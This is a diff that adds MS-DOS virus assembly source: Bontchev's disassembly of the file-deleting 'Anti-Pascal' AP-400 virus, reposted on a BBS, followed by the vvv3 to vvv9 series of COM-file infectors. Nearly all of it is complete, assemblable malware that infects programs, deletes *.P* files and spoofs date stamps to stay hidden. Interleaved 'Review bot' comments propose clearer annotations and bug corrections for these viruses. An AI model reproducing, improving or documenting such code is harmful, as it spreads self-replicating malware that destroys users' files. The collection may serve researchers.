+ + +; The End.--- + + * Origin: ESaSS / Thunderbyte support, The Netherlands (2:280/200) + +--- + RonMail 1.0 Programmer's Inn - Home of FeatherNet (619)-446-4506 +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:08) Number: 3562 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: ANTI PASCAL Conf: (16) VIRUS +--------------------------------------------------------------------------- + page ,132 + name AP400 + title The 'Anti-Pascal' virus, version AP-400 + .radix 16 + +; +...................................................................... +...... +; . Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, +ap. 51 . +; . Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +. +; . +. +; . The 'Anti-Pascal' Virus, version AP-400 +. +; . Disassembled by Vesselin Bontchev, July 1990 +. +; . +. +; . Copyright (c) Vesselin Bontchev 1989, 1990 +. +; . +. +; . This listing is only to be made available to virus +researchers . +; . or software writers on a need-to-know basis. +. +; +...................................................................... +...... + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +v_const = 2042d + +start: + jmp v_entry + db 0CA ; Virus signature + + db (2048d - 9) dup (90) ; The original "program" + + mov ax,4C00 ; Just exit + int 21 + +v_start label byte +first4 db 0E9, 0F8, 7, 90 +allcom db '*.COM', 0 + +mydta label byte +reserve db 15 dup (?) +attrib db ? +time dw ? +date dw ? +fsize dd ? +namez db 14d dup (?) + +allp db 0, '?????????A?' +maxdrv db ? +sign db 'PAD' + +v_entry: + push ax ; Save AX & DX + push dx + + mov ah,19 ; Get the default drive + int 21 + push ax ; Save it on stack + mov ah,0E ; Set it as default (?!) 
+ mov dl,al + int 21 ; Do it + + call self ; Determine the virus' start +address +self: + pop si + sub si,offset self-v_const + +; Save the number of logical drives in the system: + + mov byte ptr [si+offset maxdrv-v_const],al + +; Restore the first 4 bytes of the infected program: + + mov ax,[si+offset first4-v_const] + mov word ptr ds:[offset start],ax + mov ax,[si+offset first4+2-v_const] + mov word ptr ds:[offset start+2],ax + + mov ah,1A ; Set new DTA + lea dx,[si+offset mydta-v_const] + int 21 ; Do it +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:08) Number: 3563 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: ANTI PASCAL Conf: (16) VIRUS +--------------------------------------------------------------------------- + pop ax ; Restore current drive in AL + push ax ; Keep it on stack + + call inf_drive ; Proceed with the current drive + + xor al,al ; For all logical drives in +the system +drv_lp: + call inf_drive ; Proceed with drive + jbe drv_lp ; Loop until no more drives + + pop ax ; Restore the saved current drive + mov ah,0E ; Set it as current drive + mov dl,al + int 21 ; Do it + + mov dx,80 ; Restore original DTA + mov ah,1A + int 21 ; Do it + + mov si,offset start + pop dx ; Restore DX & AX + pop ax + jmp si ; Run the original program + +inf_drive: + push ax ; Save the selected drive number +on stack + mov ah,0E ; Select that drive + mov dl,al + int 21 ; Do ti + pop ax ; Restore AX + + push ax ; Save the registers used + push bx + push cx + push si ; Save SI + + mov cx,1 ; Read sector #50 of the drive +specified + mov dx,50d + lea bx,[si+offset v_end-v_const] + push ax ; Save AX + push bx ; Save BX, CX & DX also + push cx + push dx + int 25 ; Do read + pop dx ; Clear the stack + pop dx ; Restore saved DX, CX & BX + pop cx + pop bx + jnc wr_drive ; Write the information back if no +error + + pop ax ; Restore AX + pop si ; Restore SI + +drv_xit: + pop cx ; Restore 
used registers + pop bx + pop ax + + inc al ; Go to next drive number + cmp al,[si+offset maxdrv-v_const] ; See if there +are more drives +xit: + ret ; Exit + +wr_drive: + pop ax ; Restore drive number in AL + int 26 ; Do write + pop ax ; Clear the stack + pop si ; Restore Si + jnc cont ; Continue if no error + clc + jmp drv_xit ; Otherwise exit + +; Find first COM file on the current directory of the selected drive: + +cont: + mov ah,4E + xor cx,cx ; Normal files only + lea dx,[si+offset allcom-v_const] ; File mask +next: + int 21 ; Do find + jc no_more ; Quit search if no more such files + lea dx,[si+offset namez-v_const] ; Get file name +found + call infect ; Infect that file + mov ah,4F ; Prepare for FindNext + jc next ; If infection not successful, +go to next file + jmp drv_xit ; Otherwise quit + +no_more: + mov ah,13 ; Delete all *.P* files in +that dir + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:08) Number: 3564 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: ANTI PASCAL Conf: (16) VIRUS +--------------------------------------------------------------------------- + lea dx,[si+offset allp-v_const] + int 21 ; Do it + clc + jmp drv_xit ; Done. Exit + +namaddr dw ? ; Address of the file name buffer + +infect: + mov [si+offset namaddr-v_const],dx ; Save file +name address + + mov ax,4301 ; Reset all file attributes + xor cx,cx + int 21 ; Do it + jc xit ; Exit on error + + mov ax,3D02 ; Open file for both reading and +writing + int 21 + jc xit ; Exit on arror + mov bx,ax ; Save file handle in BX + + mov cx,4 ; Read the first 4 bytes of the +file + mov ah,3F + lea di,[si+offset first4-v_const] ; Save them in +first4 + mov dx,di + int 21 ; Do it + jc quit ; Exit on error + + cmp byte ptr [di+3],0CA ; File already infected? 
+ stc ; Set CF to indicate it + jz quit ; Don't touch this file if so + + mov cx,[si+offset fsize-v_const] + cmp cx,2048d ; Check if file size >= 2048 bytes + jb quit ; Exit if not + cmp cx,64000d ; Check if file size <= 64000 +bytes + stc ; Set CF to indicate it + ja quit ; Exit if not + + xor cx,cx ; Seek to file end + xor dx,dx + mov ax,4202 + int 21 ; Do it + push ax ; Save file size on stack + jc quit ; Exit on error + +; Write the virus body after the end of file: + + mov cx,v_end-v_start + nop + lea dx,[si+offset v_start-v_const] + mov ah,40 + int 21 ; Do it + jc quit ; Exit on error + pop ax ; Restore file size in AX + +; Form a new address for the first JMP instruction in AX: + + add ax,v_entry-v_start-3 + mov byte ptr [di],0E9 ; JMP opcode + mov [di+1],ax + mov byte ptr [di+3],0CA ; Set the "file +infected" sign + + xor cx,cx ; Seek to file beginning + xor dx,dx + mov ax,4200 + int 21 ; Do it + jc quit ; Exit on error + + mov cx,4 ; Write the new first 4 bytes +of the file + mov dx,di + mov ah,40 + int 21 ; Do it + +quit: + pushf ; Save flags + + mov ax,5701 ; Set file date & time + mov cx,[si+offset time-v_const] ; Get time from +mydta + mov dx,[si+offset date-v_const] ; Get date from +mydta + int 21 ; Do it + + mov ah,3E ; Close the file + int 21 + + mov ax,4301 ; Set file attributes + mov cl,[si+offset attrib-v_const] ; Get them +from mydta + xor ch,ch + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:08) Number: 3565 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: ANTI PASCAL Conf: (16) VIRUS +--------------------------------------------------------------------------- + mov dx,[si+offset namaddr-v_const] ; Point to +file name + int 21 ; Do it + + popf ; Restore flags + ret + +v_end equ $ + +code ends + end start + +--- + RonMail 1.0 Programmer's Inn - Home of FeatherNet (619)-446-4506 
diff --git a/MSDOS/Virus.MSDOS.Unknown.vvv3.asm b/MSDOS/Virus.MSDOS.Unknown.vvv3.asm new file mode 100644 index 00000000..9fb5cb94 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vvv3.asm @@ -0,0 +1,127 @@ +.model tiny +.code +org 100h +kkk: + nop ; ID + nop ; ID + + mov cx,80h + mov si,0080h + mov di,0ff7fh + rep movsb ; save param + + lea ax,begp ; begin prog + mov cx,ax + sub ax,100h + mov ds:[0fah],ax ; len VIR + add cx,fso + mov ds:[0f8h],cx ; begin buffer W + ADD CX,AX + mov ds:[0f6h],cx ; begin buffer R + + mov cx,ax + lea si,kkk + mov di,ds:[0f8h] +RB: REP MOVSB ; move v + + stc + + LEA DX,FFF + MOV AH,4EH + MOV CX,20H + INT 21H ; find first + + or ax,ax + jz LLL + jmp done + +LLL: + MOV AH,2FH + INT 21H ; get DTA + + mov ax,es:[bx+1ah] + mov ds:[0fch],ax ; size + add bx,1eh + mov ds:[0feh],bx ; point to name + + clc + mov ax,3d02h + mov dx,bx + int 21h ; open file + + mov bx,ax + mov ah,3fh + mov cx,ds:[0fch] + mov dx,ds:[0f6h] + int 21h ; read file + + mov bx,dx + mov ax,[bx] + sub ax,9090h + jz fin + + + MOV AX,ds:[0fch] + mov bx,ds:[0f6h] + mov [bx-2],ax ; correct old len + + mov ah,3ch + mov cx,00h + mov dx,ds:[0feh] ; point to name + clc + int 21h ; create file + + mov bx,ax ; # + mov ah,40h + mov cx,ds:[0fch] + add cx,ds:[0fah] + mov DX,ds:[0f8h] + int 21h ; write file + + + mov ah,3eh + int 21h ;close file + +FIN: + stc + mov ah,4fh + int 21h ; find next + + or ax,ax + jnz done + + JMP lll + +DONE: + + mov cx,80h + mov si,0ff7fh + mov di,0080h + rep movsb ; restore param + + MOV AX,0A4F3H + mov ds:[0fff9h],ax + mov al,0eah + mov ds:[0fffbh],al + mov ax,100h + mov ds:[0fffch],ax + lea si,begp + lea di,kkk + mov ax,cs + mov ds:[0fffeh],ax + mov kk,ax + mov cx,fso + + db 0eah + dw 0fff9h +kk dw 0000h + +fff db '*?.com',0 +fso dw 0005h ; ----- alma mater + + +begp: + MOV AX,4C00H + int 21h ; exit + +end kkk \ No newline at end of file 
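Review bot: The scratch words stored by `mov ds:[0fah],ax`, `mov ds:[0f8h],cx`, `mov ds:[0f6h],cx`, `mov ds:[0fch],ax` and `mov ds:[0feh],bx` keep the routine's whole state inside the PSP, yet only terse trailing comments name them, and the `MOV AX,0A4F3H` … `db 0eah` / `dw 0fff9h` tail after `DONE:` is uncommented in this file (vvv4 onward labels it `remove REP MOVSB and FAR JMP cs:0100`). A header comment such as `; PSP scratch: [F6h] read buffer, [F8h] write buffer, [FAh] virus length, [FCh] host size, [FEh] host name ptr; tail builds REP MOVSB + JMP FAR cs:0100 at FFF9h and jumps to it` would let an analyst follow the control flow without tracing every store. Mnemonic case is also mixed (`MOV AH,4EH` beside `mov ah,3fh`, `RB: REP MOVSB`); one case throughout is easier to read and grep. The same applies to vvv4, vvv5, vvv6, vvv7, vvv8 and vvv9, which reuse this layout verbatim.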
diff --git a/MSDOS/Virus.MSDOS.Unknown.vvv4.asm b/MSDOS/Virus.MSDOS.Unknown.vvv4.asm new file mode 100644 index 00000000..82dc7200 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vvv4.asm 
@@ -0,0 +1,134 @@ +.model tiny +.code +org 100h +kkk: + nop ; ID + nop ; ID + + mov cx,80h + mov si,0080h + mov di,0ff7fh + rep movsb ; save param + + lea ax,begp ; begin prog + mov cx,ax + sub ax,100h + mov ds:[0fah],ax ; len VIR + add cx,fso + mov ds:[0f8h],cx ; begin buffer W + ADD CX,AX + mov ds:[0f6h],cx ; begin buffer R + + mov cx,ax + lea si,kkk + mov di,ds:[0f8h] +RB: REP MOVSB ; move v + + stc + + LEA DX,FFF + MOV AH,4EH + MOV CX,20H + INT 21H ; find first + + or ax,ax + jz LLL + jmp done + +LLL: + MOV AH,2FH + INT 21H ; get DTA + + mov ax,es:[bx+1ah] + mov ds:[0fch],ax ; size + add bx,1eh + mov ds:[0feh],bx ; point to name + + add ax,180h ; if new len file + len VIR + 180h > FFF0 + add ax,ds:[0fah] ; then skip this file + add ax,fso + cmp ax,0fff0h + ja fin + + clc + mov ax,3d02h + mov dx,bx + int 21h ; open file + + mov bx,ax + mov ah,3fh + mov cx,ds:[0fch] + mov dx,ds:[0f6h] + int 21h ; read file + + mov bx,dx + mov ax,[bx] + sub ax,9090h + jz fin ; if file inf. then skip this file + + + MOV AX,ds:[0fch] + mov bx,ds:[0f6h] + mov [bx-2],ax ; correct old len + + mov ah,3ch + mov cx,00h + mov dx,ds:[0feh] ; point to name + clc + int 21h ; create file + + mov bx,ax ; # + mov ah,40h + mov cx,ds:[0fch] + add cx,ds:[0fah] + mov DX,ds:[0f8h] + int 21h ; write file + + + mov ah,3eh + int 21h ;close file + +FIN: + stc + mov ah,4fh + int 21h ; find next + + or ax,ax + jnz done + + JMP lll + +DONE: + + mov cx,80h + mov si,0ff7fh + mov di,0080h + rep movsb ; restore param + + MOV AX,0A4F3H + mov ds:[0fff9h],ax + mov al,0eah + mov ds:[0fffbh],al + mov ax,100h + mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100 + + lea si,begp + lea di,kkk + mov ax,cs + mov ds:[0fffeh],ax + mov kk,ax + mov cx,fso + + db 0eah + dw 0fff9h +kk dw 0000h + +fff db '*?.com',0 +fso dw 0005h ; source len file + + +begp: + MOV AX,4C00H + int 21h ; exit + +end kkk 
diff --git a/MSDOS/Virus.MSDOS.Unknown.vvv5.asm b/MSDOS/Virus.MSDOS.Unknown.vvv5.asm new file mode 100644 index 00000000..4ed7938b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vvv5.asm 
@@ -0,0 +1,143 @@ +.model tiny +.code +org 100h +kkk: + nop ; ID + nop ; ID + + mov cx,80h + mov si,0080h + mov di,0ff7fh + rep movsb ; save param + + lea ax,begp ; begin prog + mov cx,ax + sub ax,100h + mov ds:[0fah],ax ; len VIR + add cx,fso + mov ds:[0f8h],cx ; begin buffer W + ADD CX,AX + mov ds:[0f6h],cx ; begin buffer R + + mov cx,ax + lea si,kkk + mov di,ds:[0f8h] +RB: REP MOVSB ; move v + + stc + + LEA DX,FFF + MOV AH,4EH + MOV CX,20H + INT 21H ; find first + + or ax,ax + jz LLL + jmp done + +LLL: + MOV AH,2FH + INT 21H ; get DTA + + mov ax,es:[bx+1ah] + mov ds:[0fch],ax ; size + add bx,1eh + mov ds:[0feh],bx ; point to name + + add ax,180h ; if new len file + len VIR + 180h > FFF0 + add ax,ds:[0fah] ; then skip this file + add ax,fso + cmp ax,0fff0h + ja fin + + clc + mov ax,3d02h + mov dx,bx + int 21h ; open file + + mov bx,ax + mov ah,3fh + mov cx,ds:[0fch] + mov dx,ds:[0f6h] + int 21h ; read file + + mov bx,dx + mov ax,[bx] + sub ax,9090h + jz fin ; if file inf. then skip this file + + mov al,'M' + mov di,dx + mov cx,ds:[0fch] + repne scasb + jne cont + mov al,'Z' + cmp es:[di],al + je fin ; if converted then skip + +cont: + MOV AX,ds:[0fch] + mov bx,ds:[0f6h] + mov [bx-2],ax ; correct old len + + mov ah,3ch + mov cx,00h + mov dx,ds:[0feh] ; point to name + clc + int 21h ; create file + + mov bx,ax ; # + mov ah,40h + mov cx,ds:[0fch] + add cx,ds:[0fah] + mov DX,ds:[0f8h] + int 21h ; write file + + + mov ah,3eh + int 21h ;close file + +FIN: + stc + mov ah,4fh + int 21h ; find next + + or ax,ax + jnz done + + JMP lll + +DONE: + + mov cx,80h + mov si,0ff7fh + mov di,0080h + rep movsb ; restore param + + MOV AX,0A4F3H + mov ds:[0fff9h],ax + mov al,0eah + mov ds:[0fffbh],al + mov ax,100h + mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100 + + lea si,begp + lea di,kkk + mov ax,cs + mov ds:[0fffeh],ax + mov kk,ax + mov cx,fso + + db 0eah + dw 0fff9h +kk dw 0000h + +fff db '*?.com',0 +fso dw 0005h ; source len file + + +begp: + MOV AX,4C00H + int 21h ; 
exit + +end kkk diff --git a/MSDOS/Virus.MSDOS.Unknown.vvv6.asm b/MSDOS/Virus.MSDOS.Unknown.vvv6.asm new file mode 100644 index 00000000..c422af9f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vvv6.asm 
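Review bot: The `mov al,'M'` / `repne scasb` / `cmp es:[di],al` sequence after the `sub ax,9090h` marker test is commented only `if converted then skip`, which does not say what is being detected; it scans the host image read into the buffer for a byte 'M' immediately followed by 'Z', apparently to catch an MZ (EXE) signature inside a file named .COM (vvv9 later spells this out as `if file .COM is EXE then skip` for its header-only variant). A comment such as `; scan host for 'MZ': skip .COM files that are really EXE images` would make the heuristic legible. The scan also silently depends on ES still holding the segment returned by the `MOV AH,2FH` get-DTA call, since `scasb` and the `es:[di]` compare address through ES while `di` was taken from the DS-relative buffer offset; that assumption deserves a note at `mov di,dx`. The same block recurs in vvv6, vvv7 and vvv8, and in looped form under `NEWS:` in vvv9.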
@@ -0,0 +1,147 @@ +.model tiny +.code +org 100h +kkk: + nop ; ID + nop ; ID + + mov cx,80h + mov si,0080h + mov di,0ff7fh + rep movsb ; save param + + lea ax,begp ; begin prog + mov cx,ax + sub ax,100h + mov ds:[0fah],ax ; len VIR + add cx,fso + mov ds:[0f8h],cx ; begin buffer W + ADD CX,AX + mov ds:[0f6h],cx ; begin buffer R + + mov cx,ax + lea si,kkk + mov di,ds:[0f8h] +RB: REP MOVSB ; move v + + stc + + LEA DX,FFF + MOV AH,4EH + MOV CX,20H + INT 21H ; find first + + or ax,ax + jz LLL + jmp done + +LLL: + MOV AH,2FH + INT 21H ; get DTA + + mov ax,es:[bx+1ah] + mov ds:[0fch],ax ; size + add bx,1eh + mov ds:[0feh],bx ; point to name + + mov ax,'OC' ; "CO" + sub ax,ds:[009eh] + je fin ; if file name CO*.com then skip + + add ax,180h ; if new len file + len VIR + 180h > FFF0 + add ax,ds:[0fah] ; then skip this file + add ax,fso + cmp ax,0fff0h + ja fin + + clc + mov ax,3d02h + mov dx,bx + int 21h ; open file + + mov bx,ax + mov ah,3fh + mov cx,ds:[0fch] + mov dx,ds:[0f6h] + int 21h ; read file + + mov bx,dx + mov ax,[bx] + sub ax,9090h + jz fin ; if file inf. 
then skip this file + + mov al,'M' + mov di,dx + mov cx,ds:[0fch] + repne scasb + jne cont + mov al,'Z' + cmp es:[di],al + je fin ; if converted then skip + +cont: + MOV AX,ds:[0fch] + mov bx,ds:[0f6h] + mov [bx-2],ax ; correct old len + + mov ah,3ch + mov cx,00h + mov dx,ds:[0feh] ; point to name + clc + int 21h ; create file + + mov bx,ax ; # + mov ah,40h + mov cx,ds:[0fch] + add cx,ds:[0fah] + mov DX,ds:[0f8h] + int 21h ; write file + + + mov ah,3eh + int 21h ;close file + +FIN: + stc + mov ah,4fh + int 21h ; find next + + or ax,ax + jnz done + + JMP lll + +DONE: + + mov cx,80h + mov si,0ff7fh + mov di,0080h + rep movsb ; restore param + + MOV AX,0A4F3H + mov ds:[0fff9h],ax + mov al,0eah + mov ds:[0fffbh],al + mov ax,100h + mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100 + + lea si,begp + lea di,kkk + mov ax,cs + mov ds:[0fffeh],ax + mov kk,ax + mov cx,fso + + db 0eah + dw 0fff9h +kk dw 0000h + +fff db '*?.com',0 +fso dw 0005h ; source len file + + +begp: + MOV AX,4C00H + int 21h ; exit + +end kkk diff --git a/MSDOS/Virus.MSDOS.Unknown.vvv7.asm b/MSDOS/Virus.MSDOS.Unknown.vvv7.asm new file mode 100644 index 00000000..03c58536 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vvv7.asm 
@@ -0,0 +1,153 @@ +.model tiny +.code +org 100h +kkk: + nop ; ID +count db 90h ; ID + + mov cx,80h + mov si,0080h + mov di,0ff7fh + rep movsb ; save param + + lea ax,begp ; begin prog + mov cx,ax + sub ax,100h + mov ds:[0fah],ax ; len VIR + add cx,fso + mov ds:[0f8h],cx ; begin buffer W + ADD CX,AX + mov ds:[0f6h],cx ; begin buffer R + + mov cx,ax + lea si,kkk + mov di,ds:[0f8h] +RB: REP MOVSB ; move v + + mov al,3 ; inf. only 3 file + mov count,al + + stc + + LEA DX,FFF + MOV AH,4EH + MOV CX,20H + INT 21H ; find first + + or ax,ax + jz LLL + jmp done + +LLL: + MOV AH,2FH + INT 21H ; get DTA + + mov ax,es:[bx+1ah] + mov ds:[0fch],ax ; size + add bx,1eh + mov ds:[0feh],bx ; point to name + + mov ax,'OC' ; "CO" + sub ax,ds:[009eh] + je fin ; if file name CO*.com then skip + + add ax,180h ; if new len file + len VIR + 180h > FFF0 + add ax,ds:[0fah] ; then skip this file + add ax,fso + cmp ax,0fff0h + ja fin + + clc + mov ax,3d02h + mov dx,bx + int 21h ; open file + + mov bx,ax + mov ah,3fh + mov cx,ds:[0fch] + mov dx,ds:[0f6h] + int 21h ; read file + + mov bx,dx + mov ax,[bx] + sub ax,9090h + jz fin ; if file inf. 
then skip this file + + mov al,'M' + mov di,dx + mov cx,ds:[0fch] + repne scasb + jne cont + mov al,'Z' + cmp es:[di],al + je fin ; if converted then skip + +cont: + MOV AX,ds:[0fch] + mov bx,ds:[0f6h] + mov [bx-2],ax ; correct old len + + mov ah,3ch + mov cx,00h + mov dx,ds:[0feh] ; point to name + clc + int 21h ; create file + + mov bx,ax ; # + mov ah,40h + mov cx,ds:[0fch] + add cx,ds:[0fah] + mov DX,ds:[0f8h] + int 21h ; write file + + + mov ah,3eh + int 21h ;close file + + dec count + jz done + +FIN: + stc + mov ah,4fh + int 21h ; find next + + or ax,ax + jnz done + + JMP lll + +DONE: + + mov cx,80h + mov si,0ff7fh + mov di,0080h + rep movsb ; restore param + + MOV AX,0A4F3H + mov ds:[0fff9h],ax + mov al,0eah + mov ds:[0fffbh],al + mov ax,100h + mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100 + + lea si,begp + lea di,kkk + mov ax,cs + mov ds:[0fffeh],ax + mov kk,ax + mov cx,fso + + db 0eah + dw 0fff9h +kk dw 0000h + +fff db '*?.com',0 +fso dw 0005h ; source len file + + +begp: + MOV AX,4C00H + int 21h ; exit + +end kkk diff --git a/MSDOS/Virus.MSDOS.Unknown.vvv8.asm b/MSDOS/Virus.MSDOS.Unknown.vvv8.asm new file mode 100644 index 00000000..7eccf081 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vvv8.asm 
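Review bot: `count db 90h ; ID` at offset 101h is a data byte sitting in the instruction stream: on entry it executes as a NOP (the second marker byte), and only after `RB: REP MOVSB` has copied the body into the write buffer is it overwritten by `mov al,3` / `mov count,al`, so the copy written to hosts still carries 90 90 while the in-memory byte is counted down by `dec count` / `jz done`. None of this is stated; the `; ID` comment is all there is. Propose at `mov count,al`: `; patches the in-memory counter only; body was copied above, so written hosts keep the 90 90 marker`, and at `count db 90h`: `; executed as NOP on entry, reused as per-run infection counter`. The same construct is carried into vvv8 and vvv9.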
@@ -0,0 +1,183 @@ +.model tiny +.code +org 100h +kkk: + nop ; ID +count db 90h ; ID + + mov cx,80h + mov si,0080h + mov di,0ff7fh + rep movsb ; save param + + lea ax,begp ; begin prog + mov cx,ax + sub ax,100h + mov ds:[0fah],ax ; len VIR + add cx,fso + mov ds:[0f8h],cx ; begin buffer W + ADD CX,AX + mov ds:[0f6h],cx ; begin buffer R + + mov cx,ax + lea si,kkk + mov di,ds:[0f8h] +RB: REP MOVSB ; move v + + mov al,3 ; inf. only 3 file + mov count,al + + mov ah,2ah + int 21h + mov ds:[0f2h],dx ; + mov ds:[0f4h],cx ; save system date + + stc + + LEA DX,FFF + MOV AH,4EH + MOV CX,20H + INT 21H ; find first + + or ax,ax + jz LLL + jmp done + +LLL: + MOV AH,2FH + INT 21H ; get DTA + + mov ax,es:[bx+1ah] + mov ds:[0fch],ax ; size + add bx,1eh + mov ds:[0feh],bx ; point to name + + mov ax,'OC' ; "CO" + sub ax,ds:[009eh] + jne cont0 ; if file name CO*.com then skip + jmp fin + +cont0: + add ax,180h ; if new len file + len VIR + 180h > FFF0 + add ax,ds:[0fah] ; then skip this file + add ax,fso + cmp ax,0fff0h + jna cont2 + jmp fin + +cont2: + mov cx,ds:[98h] + and cx,001fh + mov dl,cl + mov ax,ds:[98h] + and ax,01e0h + mov cl,5 + sar ax,cl + mov dh,al + mov ax,ds:[98h] + and ax,0fe00h + mov cl,9 + sar ax,cl + mov cx,ax + add cx,1980 + mov ah,2bh + int 21h ; set system time + + clc + mov ax,3d02h + mov dx,bx + int 21h ; open file + + mov bx,ax + mov ah,3fh + mov cx,ds:[0fch] + mov dx,ds:[0f6h] + int 21h ; read file + + mov bx,dx + mov ax,[bx] + sub ax,9090h + jz fin ; if file inf. 
then skip this file + + mov al,'M' + mov di,dx + mov cx,ds:[0fch] + repne scasb + jne cont + mov al,'Z' + cmp es:[di],al + je fin ; if converted then skip + +cont: + MOV AX,ds:[0fch] + mov bx,ds:[0f6h] + mov [bx-2],ax ; correct old len + + mov ah,3ch + mov cx,00h + mov dx,ds:[0feh] ; point to name + clc + int 21h ; create file + + mov bx,ax ; # + mov ah,40h + mov cx,ds:[0fch] + add cx,ds:[0fah] + mov DX,ds:[0f8h] + int 21h ; write file + + + mov ah,3eh + int 21h ;close file + + dec count + jz done + +FIN: + stc + mov ah,4fh + int 21h ; find next + + or ax,ax + jnz done + + JMP lll + +DONE: + mov dx,ds:[0f2h] + mov cx,ds:[0f4h] + mov ah,2bh + int 21h + + mov cx,80h + mov si,0ff7fh + mov di,0080h + rep movsb ; restore param + + MOV AX,0A4F3H + mov ds:[0fff9h],ax + mov al,0eah + mov ds:[0fffbh],al + mov ax,100h + mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100 + + lea si,begp + lea di,kkk + mov ax,cs + mov ds:[0fffeh],ax + mov kk,ax + mov cx,fso + + db 0eah + dw 0fff9h +kk dw 0000h + +fff db '*?.com',0 +fso dw 0005h ; source len file + + +begp: + MOV AX,4C00H + int 21h ; exit + +end kkk diff --git a/MSDOS/Virus.MSDOS.Unknown.vvv9.asm b/MSDOS/Virus.MSDOS.Unknown.vvv9.asm new file mode 100644 index 00000000..4b00899e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vvv9.asm 
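Review bot: The comment `; set system time` on the `int 21h` after `mov ah,2bh` in the `cont2:` block is wrong: AH=2Bh is Set System Date, and the preceding instructions unpack the DOS packed date word at `ds:[98h]` (DTA+18h, the found file's date stamp) into DL=day, DH=month and CX=1980+year, which is exactly the 2Bh register contract. The `mov ah,2ah` call near the top (`save system date` into `ds:[0f2h]`/`ds:[0f4h]`) and the matching restore at `DONE:` confirm the reading. Presumably the point is that the file recreated by function 3Ch then carries the host's original date; propose `; set system date to the host's DTA date so the recreated file keeps its date stamp (restored at DONE)` and `; DTA+18h = found file's packed date` at the first `mov cx,ds:[98h]`. vvv9 carries the identical block and comment.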
@@ -0,0 +1,189 @@ +.model tiny +.code +org 100h +kkk: + nop ; ID +count db 90h ; ID + + mov cx,80h + mov si,0080h + mov di,0ff7fh + rep movsb ; save param + + lea ax,begp ; begin prog + mov cx,ax + sub ax,100h + mov ds:[0fah],ax ; len VIR + add cx,fso + mov ds:[0f8h],cx ; begin buffer W + ADD CX,AX + mov ds:[0f6h],cx ; begin buffer R + + mov cx,ax + lea si,kkk + mov di,ds:[0f8h] +RB: REP MOVSB ; move v + + mov al,3 ; inf. only 3 file + mov count,al + + mov ah,2ah + int 21h + mov ds:[0f2h],dx ; + mov ds:[0f4h],cx ; save system date + + stc + + LEA DX,FFF + MOV AH,4EH + MOV CX,20H + INT 21H ; find first + + or ax,ax + jz LLL + jmp done + +LLL: + MOV AH,2FH + INT 21H ; get DTA + + mov ax,es:[bx+1ah] + mov ds:[0fch],ax ; size + add bx,1eh + mov ds:[0feh],bx ; point to name + + mov ax,'OC' ; "CO" + sub ax,ds:[009eh] + jne cont0 ; if file name CO*.com then skip + jmp fin + +cont0: + add ax,180h ; if new len file + len VIR + 180h > FFF0 + add ax,ds:[0fah] ; then skip this file + add ax,fso + cmp ax,0fff0h + jna cont2 + jmp fin + +cont2: + mov cx,ds:[98h] + and cx,001fh + mov dl,cl + mov ax,ds:[98h] + and ax,01e0h + mov cl,5 + sar ax,cl + mov dh,al + mov ax,ds:[98h] + and ax,0fe00h + mov cl,9 + sar ax,cl + mov cx,ax + add cx,1980 + mov ah,2bh + int 21h ; set system time + + clc + mov ax,3d02h + mov dx,bx + int 21h ; open file + + mov bx,ax + mov ah,3fh + mov cx,ds:[0fch] + mov dx,ds:[0f6h] + int 21h ; read file + + mov bx,dx + mov ax,[bx] + cmp ax,9090h + je fin ; if file inf. 
then skip this file + cmp ax,'ZM' + je fin ; if file .COM is EXE then skip + + mov di,dx + mov cx,ds:[0fch] +NEWS: + or cx,cx + js cont + mov al,'M' + repne scasb + jne cont + mov al,'Z' + cmp es:[di],al + je fin ; if converted then skip + jmp news + +cont: + MOV AX,ds:[0fch] + mov bx,ds:[0f6h] + mov [bx-2],ax ; correct old len + + mov ah,3ch + mov cx,00h + mov dx,ds:[0feh] ; point to name + clc + int 21h ; create file + + mov bx,ax ; # + mov ah,40h + mov cx,ds:[0fch] + add cx,ds:[0fah] + mov DX,ds:[0f8h] + int 21h ; write file + + + mov ah,3eh + int 21h ;close file + + dec count + jz done + +FIN: + stc + mov ah,4fh + int 21h ; find next + + or ax,ax + jnz done + + JMP lll + +DONE: + mov dx,ds:[0f2h] + mov cx,ds:[0f4h] + mov ah,2bh + int 21h + + mov cx,80h + mov si,0ff7fh + mov di,0080h + rep movsb ; restore param + + MOV AX,0A4F3H + mov ds:[0fff9h],ax + mov al,0eah + mov ds:[0fffbh],al + mov ax,100h + mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100 + + lea si,begp + lea di,kkk + mov ax,cs + mov ds:[0fffeh],ax + mov kk,ax + mov cx,fso + + db 0eah + dw 0fff9h +kk dw 0000h + +fff db '*?.com',0 +fso dw 0005h ; source len file + + +begp: + MOV AX,4C00H + int 21h ; exit + +end kkk \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.vx1.asm b/MSDOS/Virus.MSDOS.Unknown.vx1.asm new file mode 100644 index 00000000..e94c6025 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vx1.asm 
